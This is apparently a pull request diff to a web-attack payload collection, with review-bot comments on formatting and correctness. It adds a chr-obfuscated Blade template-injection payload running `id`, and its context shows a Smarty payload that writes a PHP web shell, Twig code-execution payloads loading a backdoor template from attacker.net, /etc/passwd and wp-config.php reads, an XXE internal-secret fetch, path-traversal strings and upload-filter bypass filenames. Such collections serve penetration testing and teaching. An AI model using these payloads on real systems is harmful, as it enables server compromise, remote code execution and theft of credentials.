Merged
Expand Up @@ -877,11 +877,11 @@
/..\..\\..\..\\..\..\\\{FILE}
/..\..\\..\..\\..\..\\..\\\{FILE}
/..\..\\..\..\\..\..\\..\..\\\{FILE}
/\..%2f
/\..%2f\..%2f
/\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f{FILE}
/\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
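Review bot: the rendering drops the +/- markers, but the hunk counts (11 old, 11 new, 18 lines shown) mean seven lines were swapped for seven: the bare `/\..%2f…` prefixes are replaced by the same prefixes with the `{FILE}` placeholder appended, matching the eight-level `/\..%2f…{FILE}` line that was already present as context, so the list ends up consistent and this reads as correct. One thing to double-check in the untouched context above: the three `\{FILE}` lines mix `..\..\\` and `..\\..\\` separators, which looks more like a copy artifact than deliberate variants.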
1 change: 1 addition & 0 deletions GraphQL Injection/README.md
Expand Up @@ -38,6 +38,7 @@
- [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
- [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
- [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility
- [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
- [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client

40 changes: 27 additions & 13 deletions Server Side Template Injection/PHP.md
Expand Up @@ -21,21 +21,34 @@

## Templating Libraries

| Template Name | Payload Format |
| -------------- | --------- |
| Laravel Blade | `{{ }}` |
| Latte | `{var $X=""}{$X}` |
| Mustache | `{{ }}` |
| Plates | `<?= ?>` |
| Smarty | `{ }` |
| Twig | `{{ }}` |
| Template Name | Payload Format |
| --------------- | --------- |
| Blade (Laravel) | `{{ }}` |
| Latte | `{var $X=""}{$X}` |
| Mustache | `{{ }}` |
| Plates | `<?= ?>` |
| Smarty | `{ }` |
| Twig | `{{ }}` |

## Blade

[Official website](https://laravel.com/docs/master/blade)
> Blade is the simple, yet powerful templating engine that is included with Laravel.

The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`.

```php
{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
```

---

## Smarty

[Official website](https://www.smarty.net/docs/en/)
> Smarty is a template engine for PHP.

```python
```php
{$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
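Review bot: the new Blade section relies on `implode(null, …)` coercing null to an empty separator, which PHP 8.1+ reports with a deprecation notice; `implode('', …)` is equivalent and silent, and the explanatory sentence above the block should use the same form. Separately, the Smarty fence is corrected from `python` to `php`, but the block's content is Smarty template syntax rather than PHP; GitHub's highlighter accepts `smarty`, which would be the accurate tag.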
Expand All @@ -52,7 +65,7 @@

### Twig - Basic Injection

```python
```php
{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
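Review bot: `php` is better than `python` here, but the block holds Twig template expressions, not PHP, and GitHub's highlighter knows `twig`; the same applies to the other Twig payload blocks in this file, whereas the `$twig->render` snippet further down is genuinely PHP. Also, the second line mixes payload and commentary (`{{7*'7'}} would result in 49`); moving the explanation into a Twig comment (`{# would result in 49 #}`) or into the prose keeps the block copy-pasteable.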
Expand All @@ -62,7 +75,7 @@

### Twig - Template Format

```python
```php
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
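Review bot: the context line `$output = $twig > render (` is not valid PHP; the intended call is `$output = $twig->render(`, and `$user.first_name` in the array line concatenates `$user` with an undefined constant where `$user->first_name` is presumably meant. Neither is introduced by this change, but since the fence is being corrected to `php`, fixing the snippet at the same time would make the highlighting meaningful.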
Expand All @@ -76,14 +89,14 @@ $output = $twig > render (

### Twig - Arbitrary File Reading

```python
```php
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
```

### Twig - Code Execution

```python
```php
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
Expand Down Expand Up @@ -249,4 +262,5 @@ layout template:

## References

- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
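Review bot: the new reference runs the separator into the title (`everywhere- YesWeHack`) where sibling entries use ` - `; and the reference lists elsewhere in this repo (Python.md in this same PR, for instance) are ordered oldest to newest, so the March 2025 entry would sit after the March 2024 one rather than before it.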
1 change: 1 addition & 0 deletions Server Side Template Injection/Python.md
Expand Up @@ -406,3 +406,4 @@ PoC :
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
1 change: 1 addition & 0 deletions Upload Insecure Files/README.md
Expand Up @@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities.
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.`
* UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt`

* On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php".
* On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".
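Review bot: the new UTF8 filename bullet gives the header but, unlike the sibling entries (the RTLO bullet says that `name.%E2%80%AEphp.jpg` becomes `name.gpj.php`), does not state what the encoded newline in `myfile%0a.txt` is expected to do to the stored filename, so a reader cannot tell what result to check for; add the expected outcome. Also, RFC 5987/6266 write the charset as `UTF-8` (`filename*=UTF-8''…`); if the hyphen-less `UTF8` is intentional, say so, otherwise use the standard form. Unrelated to this change but visible in the context: `will became` should read `will become`.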
9 changes: 8 additions & 1 deletion XXE Injection/README.md
Expand Up @@ -68,6 +68,13 @@ Basic entity test, when the XML parser parses the external entities the result s

It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.

These are different types of entities in XML:

| Type | Prefix | Where usable |
| ---------------- | -------- | --------------------------- |
| General entity | `&name;` | Inside XML document content |
| Parameter entity | `%name;` | Only inside the DTD |

## Exploiting XXE to Retrieve Files

### Classic XXE
Expand Down Expand Up @@ -155,7 +162,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
]>
<foo>&xxe;</foo>
```
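Review bot: correct fix. The document body references `&xxe;`, a general entity, so declaring it as `<!ENTITY % xxe …>` made it a parameter entity that `&xxe;` can never resolve (a conforming parser reports an undefined entity and the payload silently does nothing). With the `%` removed, the declaration and the reference match.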
2 changes: 2 additions & 0 deletions _LEARNING_AND_SOCIALS/YOUTUBE.md
Expand Up @@ -19,6 +19,7 @@
- [Jack Rhysider - Darknet Diaries](https://www.youtube.com/@JackRhysider)
- [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)
- [Laluka - OffenSkill - Sharing is Caring](https://www.youtube.com/@TheLaluka)
- [LaurieWired - reverse engineering and research](https://www.youtube.com/@lauriewired)
- [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
- [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
- [Nahamsec](https://www.youtube.com/c/Nahamsec)
Expand All @@ -30,6 +31,7 @@
- [STÖK](https://www.youtube.com/c/STOKfredrik)
- [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
- [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q)
- [Tib3rius - CTF walkthroughs, deep dives, web app hacking, and more!](https://www.youtube.com/@tib3rius)
- [xct hacks](https://www.youtube.com/@xct_de)

## Conferences